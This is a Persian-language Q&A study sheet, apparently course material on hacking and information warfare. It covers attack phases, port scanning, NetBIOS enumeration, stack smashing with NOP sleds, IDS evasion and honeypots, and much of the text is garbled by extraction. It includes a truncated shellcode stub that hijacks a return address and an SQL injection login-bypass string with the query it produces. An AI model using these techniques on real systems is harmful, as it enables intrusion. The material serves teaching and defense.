Q&A

46

Transcript of Q&A

Page 1: Q&A
Page 2: Q&A

١

فصل اول دگاه جنگ اطالعاتي از ديانه اي راي نفوذگري برايمدل

ــ جنــگ و مراحــل طــرح ريجنــگ اطالعــات را از لحــاظ فــضا‐۱ ــا جنــگ هــايزي ي جنــگ ،ب

د؟يسه کنيمقا)ينظام(متعارف و ي ،ملـ ي در سـطوح جهـان ير سـاخت اطالعـات ي ز يس ها و شبکه ها ي جنگ در جنگ اطالعات ،سرو يفضا

ي داده شـبکه هـا ي عمـوم ي،شـبکه هـا on _line يس هـا ي تلفـن ،سـرو يرنت ،شبکه عمومنتيا. است يدفاع

يل مـ ين فـضا را تـشک يـ ن دسـت ،ا يـ از ا ي و شـبکه هـا يو ن يزي و تلو ييوي راد ي ،شبکه ها ي ماهواره ا يتجار

رو يـ نفـرات و ن .هستند هوشمندين جنگ از جنس سخت افزار و نرم افزار هايحات مورداستفاده در ايتسل.دهد

نـه راه يهز. نقـش خـود باشـند يفـا ي تواننـد قـادر بـه ا ي ندارند و از هر کجا مـ يتيچ محدود ي عمل کننده ه يها

.ن است يي متعارف پاي نسبت به جنگ هايک جنگ اطالعاتي يانداز

جـاد و حفـظ ي جنگ اطالعات مبهم است ا يک ملت و دولت در فضا ي مختلف ين بخش ها ي ب ي سنت يمرزها

ه بـر يـ ده تر شده اسـت و لـذا تک يچي پ يد اطالعات ير ساخت جد ي در ز ين الملل ي و ب ياسيتوافقات و معاهدات س

. ها در عرصه جنگ اطالعات گردديريب پذيش آسي تواند موجب افزايل توافقات مين قبيا

ر يزان تـاث يـ ن اهـداف بـر اسـاس م يـي ه به هم هـستند شـامل مراحـل تع ي جنگ هم کامال شب يزياز لحاظ طرح ر

ي دستاورد ها يابيل و ارز يات وتحل ين انجام عمل ي و همچن ي جنگ يرو ها يحات و ن يهم نمودن تسل ات و فرا يعمل

و ي اصـول کلـ يت جنگ ها نوع کار بـا هـم تفـاوت دارد ولـ ي باشد وفقط با توجه به تفاوت در ماه يجنگ م

.رندي گي هر دو جنگ کامال مشابه بوده و ازچ روش گفته شده درباال بهره ميه براياول

Page 3: Q&A

٢

د؟ينان کي را بي و تدافعيتفاوت جنگ اطالعات تهاجم‐۲ يريـ از بکـار گ يري از اطالعات دشمن ،جلوگيب ،انهدام ؛بهره بردار ي تخر يهدف از جنگ اطالعات تهاجم

يزيـ اطالعـات،طرح ر يجمـع آور . دشمن اسـت ي هاي بر آگاه ير گذار يا تاث ي و ياطالعات دشمن توسط و

ي اطالعـات تـدافع ي دهـداما هـدف از جنـگ هـا يل مـ ي را تـشک يم تهـاج ي حمله جنگ هـا يحمله و اجرا

س هـا ي سـرو يريـ جـاد و بکـار گ يق ا ي از تهاجمات دشمن از طر ي خود ي اطالعات ير ساخت ها ي،حفاظت از ز

،صـحت داده هـا ،احـراز اصـالت يت دسترسـ يـ قابل:س هـا ين سـرو يـ اطالعـات اسـت ا يستم هـا ي در س يتيامن

. باشندي ،عدم انکارمي،محرمانگ

د؟يان کني را در طول زمان را بياتيچرخه عمل‐۳ کند؟يز مي متماي نظامي را از جنگ هاي اطالعاتي حمله ،جنگ هاي متدلوژيتيچه خصوص‐۴

و کشف و بـر طـرف شـدن دي جديب هاي اطالعات و به تبع آن سرعت بروزآسيع فن آوريبه علت رشد سر

شـده و يحات جمـع آور يتـسل . شـود يرار و بروز رسان همواره تکيستي جنگ با يزيند طرح ر يع آنها فرآ يسر

نـد يفرا. پس از گذشت چند ماه کـال از رده خـارج شـوند يک هدف خاص ممکن است حت ي ين شده برا ييتع

آن يستيـ و مـستمر اسـت و نبا يند دائم يک فرا ي الزم يرو ها يحات و ن ين اهداف و فراهم آوردن تسل يي تع يها

. زمان متوقف شوديدر ط

ـ ي ير ساخت اطالعات يزک يدر ‐۵ گـاه يپا(ي کـاربرد ي و کـاربران کـه از برنامـه هـا يک شبکه محلش رسـانه ينترنت و افزا ين شبکه امکان اضافه شدن کاربران،اتصال به ا يدر ا . کند ياستفاده م ....)داده

ـ کند نام بـرده و دل يد م يستم را تهد ين س ي که ا ي ها يريب پذ يآس. کند يهاو نرم افزار وجود م ل ي .ديح دهي آن را توضيري پذبيآس

کنـد يد مـ يـ ستم را تهد يـ ه س ين ناح ي ها در ا يريب پذ ي از آس ياريبه علت استفاده از رسانه ها و نرم افزار ها بس

ق يـ نکه توجـه دق ي دهند محصوالت خود را زودتر به بازار برسانند تا ا يح م يد کنندگان ترج ي از تول ياريرا بس يز

يف بودن پروتکـل هـا ين به علت ضعيهمچن.اشکا ال ت محصول خود کنند خطا ها و يابي به تست و ارز يتر

را ممکن است ي هايريب پذينها آسياFTP,Telnetموجود همچون

. شده اندي طراحي کافيتيت امنين پروتکل ها بدون ذهنيستم کنند چون ايمتوجه س

،دشـمن يدگيچيم پ ي دانـ يکـه مـ رود و همـان طـور ي باال م يدگيچيستم ،پ يبه علت اضافه شدن امکانات به س

ح ي نـا صـح ين نگهـدار يهمچن. شوديرتر هم م يب پذ يده تر شود به مراتب آس يچيستم پ يهر چه س .ت است يامن

ازمنـد ين....... آتـش و يواره هـا يـ ها ،دياب ها ،پروکسير يمس. هاست يريب پذ يگر بروز آس يل د يستم ها دل يس

يد مـ يـ ستم را تهدي سيشتري بي هايريب پذيکته دقت نشود آسن ن يکه اگر به ا . و ارتقا مرتب هستند ينگهدار

.کند

داشته و چرا؟ير چه رشدي اخي در سالهايريب پذيآس‐۶آمـاده و )ي نفـوذ گـر يو به تبع تکنولوژ ( اطالعات يشرفت تکنولوژ يل پ ي از قب يلي داشته ،به دال ييرشد نما

يابيـ مـشکل بـودن رد ي اطالعات يستم ها يالت به س افته بودن نفوذ گران ،آسان و کم خطر بودن حم يسازمان

. داشته انديي ها رشد نمايريب پذين آسيا...آنهاو

:رندي گي ها قرار ميريب پذير در کدام سطح ازآسيموارد ز‐۷

Page 4: Q&A

٣

ل ها بدون پسورديبه اشتراک گذاشتن فا)الف FTPاستفاده نادرست از پروتکل)ب کندي در داخل برنامه استفاده ميسبر ني مسي که اسامياستفاده از برنامه ها)ج ز بافر در آن وجود داردي که احتمال سر رياستفاده از برنامه ها)د يستمي سي هايفراخوان)ه

ن اشـکال معمـوال در يـ چـون ا .رديـ گيا نرم افزار هـا قـرار مـ ي پروتکل ها و ي طراح يدر قسمت خطا ها )الف

. دهديل شبکه رخ ميستم فايس

. شودي شبکه انجام ميکر بنديف پروتکل و ضعف در پيع ضيباز هم به طراح)ب

جـاد ين مشکل ا يا ا يوند پو ي پ ي است چون مثال در استفاده از کتاب خانه ها ياده ساز ي پ يبه علت ضعف ها )ج

. شوديم

ياده سازيبه علت ضعف در پ)د

ي برنامـه هـا يرا اجـ ي،کـه بـرا ...و()system(),open: ماننـد يستمي توابع س ياده ساز يبه علت ضعف در پ )ه

. گردديگر از آنها استفاده ميد

نظارت دائم بـر شـبکه ي برا ياب و راه يروس يص نفوذ و و ي تشخ ي برا يستم ابزارها ير س ياگر مد ‐۸ تواند استفاده کند؟ي مي نفوذ خود از چه روش هايداشته باشد،نفوذگر برا

حملـه کننـده .رديـ گيت مواضـع قـرار مـ يـ ه تثبت ها که در مرحلـ ين فعال ي از مهم تر يکي ماندن رد پا ها يمخف

غلبـه بـر مـشکالت گفتـه يبـرا . گذارند استفاده کندي که از خود رد پا به جا نمي کند از ابزارهايسع يستيبا

در نحـوه ير گـذار يستم عامـل و تـاث يـ س ير مـاژول هـا ييـ ستم هـا عامـل ،تغ ي س يهاlogريي تواند با تغ يشده م

گاه ين استفاده از پايني انجام ارتباطات است همچي براcovert channelsه از ن استفاديعملکرد آنها و همچن

. شودين بردن رد پا ها مي حمله که باعث از بيف هک شده براي ضعيها

ـ ي باشد نفوذ گر از چـه راهـ يمVPNا يواره آتش و ي د يک شبکه که دارا ي به يابي دست يبرا‐۹ ي م

تواند وارد شود؟رون شـبکه ي که از بيوتر کاربرانينترنت ،نفوذ به کامپيف و سهل الوصول در ا يوتر ها ضع ي از کامپ ينفوذ به بعض

از .را دارنـد VPN بـا يتي امن يجاد تونل ها يا ا يواره آتش ي عبور از د يي شوند و توانا يواره آتش متصل م يبه د

بـه داخـل يوتر قبلـ يمپق کا يک اسب تروا از طر يارسال . که به آنها حمله شده است يفيوتر ها ضع يق کامپ يطر

.ق ارتباط با اسب ترواي دلخواه داخل شبکه از طريوتر هايو در مرحله آخر هم نفوذ به کامپ.شبکه هدف

کند؟ي حمله خود استفاده مينفوذ گر چگونه از ابزار ها برا‐۱۰

ن حالـت يهـا در سـاده تـر ن ابزاريا.از به استفاده از ابزاردارد ي ها ،نفوذ گرنيريب پذياز آس سوء استفادهيبرا

ن يهمچنـ .ستم عامـل باشـد ين س ي فرام ي اجرا يا حت يستم مورد نظر ي به س يزکي ف ي توانند شامل دسترس يخود م

ماننـد . توانـد اسـتفاده شـود ي شبکه مـ ي تبادل اطالعات رو يو روش ها script يا ابزار ها ي از برنامه ها يبعض

از شـبکه مـستقر يوتر هـا ي کامپ ي توان بر رو يع شده م ي توز ي ها ن با استفاده از ابزار يهمچن... تراواو ياسب ها

توانـد مجموعـه ي خـود مـ ينفوذ گر به کمک ابزار ها.ع شده انجام داديات خود را به صورت توزيشده و عمل

.دن به هدف حمله انجام دهديات را در جهت رسي از عمليا

Page 5: Q&A

٤

:ديان کنير بيستم زي سي آن رابرايمراحل حمله و روش ها‐۱۱ ي ارتباط،بهره منديبراFTPاستفاده از پروتکل :نجا مطرح است شامل ي که در ا يستمي س ي ها يژگيو

،اسـتفاده کـاربران از برنامـه ي ماژول يستم عامل هـا ي س ينترنت،دارايواره آتش،متصل به شبکه ا ياز د ؟C زبان سطح باال چون يلر ها يگاه داده ها،کمپاي مانند پاي کاربرديها

و whois ي مانند بانـک اطالعـات يم با استفاده از روش هاي تواني باشند که مي مواضع مييناسان مرحله ش ياول

ــ ــتفاده از تکن يهمچن ــا اس ــستجو در وب و ب ــن ج ــاي ــديک ه Time out,Tcp flag, Packet, مانن

fragmetionلد ين سوء استفاده از ف يهمچنTTL ند يسر آIP ش مانند ي پو يو استفاده از ابزارهاNessusن يا

ه را بدسـت يـ از اطالعـات اول ي تـوان مجموعـه ا ي گفته شده م يم که با استفاده از ابزار ها يرحله را انجام ده م

ستم يـ سي هايريب پـذ يستم و آسي باز سيص داده و پورت هايزبان ها فعال شبکه را تشخ يز مودم ها و م ين.آورد

. شونديان مينما

ه اطالعات کسب شده در مرحله قبل نسبت بـه نحـوه حـضور باشند با توجه ب يه م يدر مرحله بعد که هجوم اول

در مرحله . شود ين نقاط ضعف آنها اقدام به انجام حمله م ي و همچن يزات و يدشمن در شبکه و امکانات و تجه

در شــــبکه مــــورد DOS س ي توان با استفاده از سرويستم هدف مي سيب و از کارااندازيهجوم به قصد تخر

ين بـرا يم همجنـ ي نا خواسته استفاده کن يکي الکترون ي توان از نامه ها ين م يهمچن. ردجاد ک يمورد نظر اختالل ا

ي بـرا يا استفاده از ابـزار هـا يروس ها ،کرم ها ي مثل و ي توان از برنامه ها يوتر ها م ياختالل در تک تک کامپ

تـوان يشغال هم مـ انجام هجوم به قصد ا يبرا. استفاده کرد يريب پذ ي آس يچه ها يا در يشنود کلمات عبور و

ز بافر حساس هستند استفاده کرد ي که نسبت به سرر يل کلمات عبور و سوء استفاده از برنامه ها ياز شکستن فا

واره ي دور زدن دياز ر وش ها.....وSQL injectionوsniffing و ي اجتماعي چون مهندسيکه از ابزار ها.

. توان استفاده کرديآتش م

ن ي ها و از بي حفظ دسترسيد تمام تمرکز خود را بر روين مرحله باي باشد که در ا يت مواضع م يمرحله بعد تثب

ن روش يل هـا و فهرسـت هـا و همچنـ ي کردن فا ين مخف ي تراوا و همچن يبردن رد پا ها قرار داد که از اسب ها

.جاد کانال نهان استفاده کرديند و اي کردن فرآي مخفي براييها

ي بعـد ي نفـوذ هـا ين تالش خـود را بـرا يشتريد ب ي باشد با يات م ي بعد از عمل يا بر يزيمرحله آخر که برنامه ر

.آماده کرد

کند؟ي را دنبال ميزيستم هدف چه چي سيات بر روينفوذ گر با انجام عمل‐۱۲ستم يـ سيستم ،پروسـه هـا ي تواند به کلمات عبور سي خود ميات و با استفاده از ابزارهايبا استفاده از انجام عمل

توانـد سـطح ي مـ ين دسترسـ يـ دا کنـد بـا اسـتفاده از ا يـ پ يوتر ها و شبکه ها دسترسـ يستم ،کامپ ي س ي ها ،داده

ستم بـه يـ ا از منـابع س يـ ستم را بـه بدسـت آورد ،و يـ ش دهد و اطالعـات محرمانـه س ي خود را افزا ي ها يدسترس

.ر مجاز استفاده کنديصورت غ

ن چرخه قرار دارد و ي در اوج ا يکي و گراف يقو يستم استفاده از ابزارها يات س يچرا در چرخه ح ‐۱۳

گذارد؟يپس از آن رو به زوال من يـ ن پـس از آمـدن ا ياز ندارند همچن ي ن ي باشد و به تخصص خاص يار راحت م ين ابزارها بس يچون استفاده از ا

يري پـذ بين آسي مورد حمله به بازار عرضه شده و استفاده از ا ي توسط شرکت ها يتي امن يهاpatchابزار ها ،

.ابدي يبه شدت کاهش م

Page 6: Q&A

٥

فصل دوم ستم هدفي سييشناسا

ستم هدف کدامند؟ي سييه شناسايمراحل اول ‐١

شبکه هدفيافتن آدرسهاي •

س دهندگان مودم شبکه ي فعال و سرويص مودم هايتشخ •

شبکه هدفيکشف توپولوژ •

هدفيزبان هاي باز ميافتن پورتهاي •

زبانيستم عامل هر ميمشخص کردن س •

هدفي هايريب پذي آسييشناسا •

گذارند؟يار مي را در اختي چه اطالعاتwho is يبانک اطالعات ‐٢ يتـوان اطالعـات ي و با مراجعه بـه آنهـا م who isس دهنده ي وجود دارد تحت عنوان سروينترنت مراکزيدر ا

.ا آن ها را بدست آورد ارتباط بين شبکه و روش برقراريا نام حوزه شبکه هدف و مسئولي ipر آدرس ينظ

.ديح دهيق مودم را نام برده و توضيدو مرحله نفوذ به شبکه از طر ‐۳• War dialing :از يت هـدف فهرسـت يا مراجعه به سـا ي ي اجتماعي مهندسين مرحله نفوذ گر با روشهايدر ا

افتن مـودم يـ قـدام بـه ش خطوط تلفـن ا ي پو ي آورد و آنگاه با استفاده از ابزارها ي تلفن را بدست م يشماره ها

.کندي تلفن بدست امده مين شماره هايفعال از ب

• Demon dialing:ا دور زدن مرحلـه اول احـراز يافتن کلمه عبور ي جهت يد راهين مرحله نفوذ گر بايدر ا

.دا کندياصالت پ

Page 7: Q&A

٦

شود؟ي استفاده ميکي شبکه از چه تکني بدست آوردن توپولوژيبرا ‐۴ک يـ ن هـر ين نحـوه ارتبـاط بـ يـي فعـال شـبکه هـدف و تع يزبانهـا يص م يل تـشخ از شـبکه شـام ينقشه بـردار

ک نـرم افـزار يـ ن حالـت الزم اسـت بـا يـ در ا.شود ي استفاده مIPندي در سرآTTLلد ينکار از في ا يبرا.باشديم

ال فعال در شبکه ارسـ يستم ها ي از س يکي آن را به TTLلدي به ف ۱ را با انتساب مقدار ipک بسته يد بسته ، يتول

منبـع ارسـال کننـده را بـه IPافت شـد،آدرس ي درICMP Time Exceededام يکه پيدر صورت. م يکن

ن يـ و ا .ميکنـ ي ارسـال م TTL ۲نبار بسته را با مقـدار يم و ا يکنيادداشت م ين راه ي ب ياب ها يري از مس يکيعنوان

.ميکني ميير را شناساي مسياابهيري مسيب تمامين ترتيم و به ايکنيدن بسته به مقصد تکرار ميعمل را تا رس

.دي هدف را نام ببريزبان هاي باز ميص پورت هاي مختلف تشخيروشها ‐۵• TCP Connect Scanning • TCP SYN Scanning • TCP FIN Scanning • TCP Null Scanning • TCP SYN ACK Scanning • Fragmentation Scanning

.ديح دهي را توضNosstateful packet يلترهاي ف ‐۶

از قواعد ، ينند و با استفاده از مجموعه اي نشيک شبکه مير يمس آنها بر. دارنديلترها روش کار ساده اين فيا

مها بـا توجـه بـه اطالعـات ين تصميا. کننديگر را بلوکه مي دي دهند و بعضياجازه عبور م بسته هايبه بعض

اطالعـات موجـود در موارد بـا توجـه بـه يو در بعض IP ه شبکه مانندي الي موجود در پروتکلهايآدرس ده

تواننـد بـه ي مـ يلترهـا زمـان ين فيـ ا . شـود ياتخاذ م UDP و TCP يندهايه انتقال مانند سرآي اليپروتکلها

ن يهمچنـ . از شبکه جهت محافظت داشته باشـند ين مورديسهاي از کاربرد سروي عمل کنند که فهم خوبيخوب

ه ي الي درباره پروتکلهاي کنند و اطالعاتي ها عمل نميهمانند پروکس ع باشند چوني توانند سريلترها مين فيا

کاربرد ندارند

تم هدف کدام است؟يستم عامل سيص سيروش تشخ ‐٧

و نحـوه نفـوذ يريب پـذ يستم عامل ،آس ي باشد چون با توجه به نوع س ي م ي نفوذ مرحله حساس ين مرحله برا يا

مختلـف يستم عامل ها ي است که س ييتم عامل،جواب ها سيص س ي معمول تشخ ياز روش ها .ز متفائت است ين

Stackن روش يـ بـه ا . فرسـتند ي بـه ارسـال کننـده مـ TCP/IP نا متعـارف يافتي دريدر مواجهه با بسته ها

Fingerprinting ندي گوي م.

Page 8: Q&A

٧

فصل سوم هايريب پذيسوء استفاده از آس

ست ؟ياس چينتب ‐۱

Network basic I/Oه توسط شرکت است کي پروتکلIBM ي کـاربرد يواسـط برنامـه سـاز بعنوان

. قابل استفاده است tcp/ip پروتکل ي شده است وروري برنامه ها به منابع شبکه طراحيجهت دسترس

د؟يح دهياس را توضي نت بي اساسيس هايسرو ‐۲ Naming : اس يـ نـت ب يکار نـام هـا که اول . دهديک نام م يوتر ومنابع به اشتراک گذاشته شده يبه هر کامپ

. کند ي استفاده م udp 137 فرستد و از پورت يه مي خودشان را به بق broad castبه صورت

Sission : از پورتtcp 139 پروسه هـا در يکس برايک ارتباط اتصال گرا و فول دوبلي کند ي استفاده م

کند يجاد ميشبکه ا

Datagram :ق پورت يا به همه اعضا از طريم ک ناي تواند به يس مين سروياudp 138 .

م؟يد بکني باياس چه کارهايق نت بايستمها از طري نفوذ به سيبرا ‐۳ . باز tcp 139 يص پورتهاي تشخيش پورتها برايپو ‐۱

.ستم هدفي سيدن منابع اشتراکي دي برا netview ,netstat استفاده از ‐۲

. شکستن کلمات عبوريک نرم افزار براي ‐۳

Page 9: Q&A

٨

.ديح دهي را به اختصار توض stack smashing نحوه انجام ‐۴ از ي بـه مقـدار buffer. باشندي مbuffer overflow از انواع حمالت stack smashingحمالت

ر را حفـظ يـ شـود تـا مقـدار آن متغ يداده مـ ...)هيـ اعم از اشـاره گر،آرا (يري شود که به هر متغ يحافظه گفته م

يداده مـ ...)هيـ اعم از اشـاره گر،آرا (يري شود که به هر متغ ي از حافظه گفته م يراساس حمالت به مقدا .دينما

از ين اسـت کـه در بعـض ي چنـ stack smashingاسـاس حمـالت .دير را حفظ نمايشود تا مقدار آن متغ

توانـد بـا يک مهـاجم مـ يـ جـه يرد در نتيـ گيه ها صورت نمـ يز آرا ي سرر ي بر رو ي کنترل ي برنامه ساز يزبانها

bufferق يـ ز کرده و برنامه مورد نظر خود را کـه از طر ي برنامه را سرري اجرائين ضعف، پشته يده از ااستفاoverflow ن که چگونـه يا.رديوتر مورد نظر را در دست گيق آن کنترل کامپيد و از طري وارد کرده اجرا نما

:ل استي گردد به شرح ذيجاد مشکل مي باعث اbufferز يسرر

دهد،سـپس ي اسـتک قـرار مـ ي تـابع را رو ي شـود،تابع فراخواننـده پارامترهـا ي م ي فراخوان ي که تابع يهنگام

تابع فراخوانده شـده . سپارد يآدرس بازگشت را در استک قرار داده و کنترل برنامه را به تابع فراخوانده شده م

آدرس کـوچکتر م استک از آدرس بزرگتر به ي دان يم. کند يف م ي خود را ردر استک تعر ي محل يرهايز متغ ين

ر خواهد بوديجه استک به فرم زيدر نت. کنديرشد م

کـه آدرس (ر داده و آدرس مـورد نظـر خـود را ييـ توانـد آدرس بازگـشت را تغ ي مهاجم مـ bufferز يبا سرر

. آن قرار دهديبه جا) شروع برنامه است که خود مهاجم در حافظه قرار داده است

.ديح دهي را توض)canary( ي روش قنارstack smashing مقابله با ي از روشها‐۵

شـود ي مـ ي فـرا خـوان ي که تابعيهنگام.ردي گيظ استک مورد استفاده قرار م توسط برنامهء محاف يروش قنار

. دهدي شده قرار مي تابع فراخوانيرهاين آدرس بازگشت و متغي را بيبرنامه محافظ استک مقدار قنار

برنامه ادامـه ي شود و در صورت درست بودن آن اجراي چک مي تابع تمام شد مقدار قناري که اجرا يهنگام

. شودينصورت برنامه متوقف مير ايابد در غي يم

د کرد؟ي حافظه است چه بايم درکجاي کردن آن را دارexploit که قصديم برنامه ايگر ندان ‐۶

. کننـد ي استفاده مـ ينسب يم چون از آدرس دهي کنياستفاده مjmp,callن مشکل از دستورات ي حل ايبرا

ي کـه مـ يق محلـ يـ از بـه دانـستن آدرس دق يـ بـدون ن .م ي جهش کنـ IPم به محل نسبت به مقدار ي توان ي م يعني

ک يـ قـرار داده SHELL يدرسـت قبـل از رشـته ا CALLک دستور يلذا اگر .م يم به آن جهش کن يخواه

يقـرار مـ stack يم ،آدرس رشته به عنوان آدرس بازگشت بـر رو يريدر نظر بگ ن نقطهيهم به اjmpدستور

ي کـد مـا را فراخـوان يتواند ابتـدا يمcallدستور.مي کنيک ثبات کپين مقدار را در ي لست ايو تنها کاف .رديگ

.کند

Page 10: Q&A

٩

داشته باشد؟ي ممکن است در پيد چه مشکالتي کنير را بررسي عملکرد کد ز‐۷ Char shell code []= “\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46” ………………………………………………… …………………………………………………. Void main() Int *ret Ret =(int*)&ret+2; (*ret)=(int)shell code

باعث متوقف شدن nullت ين حالت هر با يکرده و در ا overflowيه از نوع کاراکتر يک آرا ينجا از يدر ا

در کـد وجـود داشـته Null مقـدار ي حـاو يتيچ بـا يد هـ يـ شـودپس نبا يم stack کردن کد در يند کپيفرا

.نشودظاهر null ت يم که باير دهيي تغيم که دستورات را به گونه اي کني ميپس سع.باشد

را ي چه راهکار shellcode انجام موفق يبرا. دهد يت حافظه و بافر را نشان م ير وضع ي شکل ز ‐۸ .دي کنيشنهادميپ

Bottom of memory DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF …….. 89ABCDEFO123456789AB CDEF 0123 4567 ..

BUFFER STF RET A ………… [bbbbsssssssssssssbbb] [ssss] [0xd8] [0x01]

[0x03]…………

دستوراتکه bبه shell دستورات يق کد به جاي دقين کد به علت ندانستن جايدر ا . باشد بر گشته استي ميگريد ين دستوري چنيبا تمام پردازنده ها دارايم تقرياستفاده کنnop دستورات يد از تعداديبا

nop يله عملگرهاي را بوسbuffer از يميم کرد و نين دستور استفاده خواهي هستند ما از ا . م ي کني پرم

هـا nop از يست اما به داخل بلـوک يما نshellcodeاخل نکه ادرس بازگشت در د ين حالت با وجود ا يدر ا

برسدshell code شوند تا نوبت بهي اجرا مnopدستورات . افتديم

[NNNNNNNNSSSSSSSSSSSS] [0XDE] [0XDE]…………………

ي خواهد پورت هاي است و مpacket generatorد يار داري که در اختيد تنها ابزاريفرض کن ‐۹

د اسـتفاده ي تواني نميا ذستور خاص يچ کد ياز ه (د؟ي کن يد چه م يص ده يره اتش را تشخ وايک د يباز )د يکن

destination portلد يم که در في فرستيروال قرار دارد ميزبان هدف که در پشت فاي به سمت ميبسته ا

م ي دهيان شماره پورت مورد نظر را قرار م

Page 11: Q&A

١٠

.ن پورت بسته استي اينعي فرستاده نشود ي به بسته ارسالياگر جواب

است که بافرش پر شـده ي ان به حد cpu مشغول نگه داشتن IDS ي از کار انداز يک راه برا ي ‐۱۰

مـشغول نگـه داشـتن ي برا يص دهد شما چه راه يندازد و نتواند حمله را تشخ ي را دور ب ييو بسته ها cpuد؟ي کنيشنهاد مي پ

يست هـا يـ تـاگرام را جداگانـه در ل يمختلـف هـر د قطعـات IDS چون . IP fragmentationبا روش

تـاگرام هـا را بـه قطعـات ياگـر نفـوذگر د . تاگرام خواهند داشت ي هر د ي در بازساز يمختلف نگه داشته و سع

ي گرفتـه خواهـد داشـت و ممکـن اسـت جهـت بررسـ cpu از يادي زيليد وقت خيم کيار کوچک تقسيبس

بخواهـد و IDS ن حالت اگـر يم در ايا بسته ها را رمز شده بفرستي. نداشته باشديتاگرام وقت کافي از ديبخش

. تلف خواهد شدcpu از ياديار زي مجدد کند وقت بسي و رمزگذارييبتواند بسته ها را رمزگشا

عمـوم قابـل مـشاهده يت کـه بـرا ينساين صفحه ا يد اول ي نفوذ کن x.comت يد به سا ي خواه يم ‐۱۱ـ ي و پسورد ورود به سـا ي نام کاربر ک صفحه ساده است که از شما ياست ـ . کنـد يت را تقاضـا م يم هم وجـود on-line يري شده است و امکان عضو گ ي طراح SQLت با ين سا يگاه داده ا يد که پا يدان

د؟ي کنين مرحله چه مي عبور از ايبرا. نداردر کـسب ديسـع ) نـام و پـسورد يلـدها ي في بـه جـا sqlوارد کردن دسـتورات (SQL injectionبا روش

قـرار '="OR ' نام کاربر و پسورد مقدار يم مثال اگر به جاي کنيلد ها مير در فييا تغيگاه داده ياطالعات از پا

:دي اير در ميگاه داده دستورالعمل به صورت زيم در پايده

select username from users

where username=' ' OR ' '=' ' AND password=' ' OR ' '=' ' جه مثبت دارد ي باشد که نتيم) null) nothing to nothing باnullسه يجه جستجو مقاين حالت نتي ادر

.ت شديگر ساين صفحه عبور کرد و وارد صفحات دي توان ازايپس م

ست؟ ي پات چيهان ‐١٢ بـه ط شـبکه ي جذب کردن و به دام انداختن نفوذگران در محـ ي است که برا يوتريستم کامپ يک س ي پات يهان

رسـرور هـا باشـد امـا يه سا ي کـه بـه ظـاهر شـب يسـرور ( ن يک سرور دروغـ ي تواند ي پات م يهان. رود يکار م

يهـا patchستم عامـل باشـد کـه يـ ک سيـ يا حتـ يـ و يساختگ LANک ي ,) ارائه ندهديدياطالعات مف

. آنها نصب نشده استي مدت هاست رويتيامن

) کـشف حملـه و دفـاع , يريشگيپ( تياحل اعمال امن ک از مر ي پات در کدام يبه نظر شما هان ‐۱۳ کند؟يفا مي اينقش مهمتر يياز آنجا . ن نقش آن در مرحله کشف حمله است ي کند اما مهمتر ي پات در هر سه مرحله به ما کمک م يهان

اد نـشان دهنـده يـ ک بـه احتمـال ز يـ دهد وجود هرگونـه تراف ي در شبکه ارائه نم يديس مف ي پات سرو يکه هان

. پات نشان دهنده نفوذ هکر به آن استي هانيک از سوي حمله است و وجود ترافيک نفوذ گر برايش تال

Page 12: Q&A

١١

ست؟ي چIDS پات نسبت به ينقاط ضعف هان ‐۱۴گر ي د يي بخواهد به آن نفوذ کند و اگر در جا ي تواند حمله را نشان دهد که کس ي م ي پات تنها در صورت يهان

ينکـه در صـورت يگـر ا يد. دهديکل شبکه را پوشش م IDSاما . شودينم رخ دهد متوجه ياز شبکه حمله ا

ق يـ رود و ممکن است هکر بتواند از طر ي باال م يتيسک امن يم ر ي نکرده باش يکر بند ي پات را با دقت پ يکه هان

.گر نفوذ کنديآن به نقاط د

ست؟ ي پات چي نسبت به هانIDS نقاط ضعف ‐۱۵ که ييچون تنها از الگوها IDS دهد اما يدارد هر گونه احتمال حمله را نشان م که يتيل ماهي پات به دليهان

ه به حمله را هـم حملـه تـصور کنـد و بـا ي شب يک ها ي کند ممکن است تراف يار دارد حمله را کشف م يدر اخت

ص ي را تـشخ يحملـه ا IDSک بـار ي اعتماد کند و اگر ير شبکه را نسبت به خود بياد مدي زي خطايغام هايپ

يص دهـد امـا هـان يد را تـشخ ي جديت شود تا حمله هايد آپديهمواره با IDS. رديده بگير آن را ناديدهد مد

.ت نداردي به اپديازيپات ن

ـ ي پا يمسئوالن سرورها .دي هست secure.com شبکه يتيرامنيشما مد ‐۱۶ يگاه داده به شـماگزارش مـ ارائـه کن يروشـ . کنـد ير م ييغ ت ي آنها مرتب توسط افراد ناشناس يدهند که داده ها د کـه بـدون ي

کند؟ راه حل خـود ين کار را مي اي و به چه منظور يد چه کس ي در ساختار سرورها کشف کن يرييتغ .ديح کنيرا تشر

م ي کن ي م يک آن را بررس يم و تراف ي ده ي در شبکه قرار م ير واقع ين با اطالعات غ يگاه داده دروغ يک سرورپا ي

يم تا نشان دهد چه کـس ي گذاريگاه داده مي پايبرا) logging service (يريس گزارش گيک سريو

پـات ي به نظر برسد که نفوذ گر شک در هان يد انقدر واقع ين سرور با يا. کند يابد و چه م ي ي م يبه آن دسترس

.بودن ان نکند

۱۷‐ xشبکه يتير امني مد x.comحفاظت از ي است او برا web server ـ ها کـه web serverک يـ يکربندي پات پ يدهد به عنوان هان ي را نشان م يت اصل يتنها صفحه اول وب سا رد ي کنـد و بـرا ي م

که گـزارش خـود ي کند به گونه ا ي ان نصب م ي رو يريس گزارش گ يک سرو ي اعمال هکر يريگـ ي نفـوذ بـه هـان ي برا ي متوجه تالش هکر x يپس از مدت . بفرستد x يزيوتر روم يرا به کامپ ي پـات م

به نظر شما . شود ي م يابير قابل رد ير اعمال نفوذگر غ ياما ناگهان ارسال گزارش قطع شده و سا .شود پات چه بوده؟ي هانيکر بندي در پxست و اشتباه يل چيدل

x پـات بـودن ان شـده و يگر نـساخته و نفـوذگر بـه محـض نفـوذ متوجـه هـان ي دي پات را مانند سرورهايهان

از xبهتـر بـود . را قطـع کـرده اسـت يريـ س گـزارش گ يسرو root يدسترسبالفصله پس از به دست اوردن

sniffer کردي استفاده ميابي رد يبرا .

:ديست؟انواع مختلف ان را نام بري چي در نفوذگريروش مهندس ‐۱۸

از يين روش نفوذگر با سودجو يدر ا . خاص يا اهداف يل به هدف ي ن ي برا ياستفاده مناسب از تعامالت اجتماع

Page 13: Q&A

١٢

حصول به ينه مناسب برايب دادن آنها زمي فري و به نوعي روابط اجتماعياط ضعف افراد در برقرارنق

... ت ها مسئوالن شبکه وير کارمندان ساي نظيقت نفوذگر از غفلت افراديدر حق. کنديات خود را فراهم مين

. کنديت استفاده را مينها

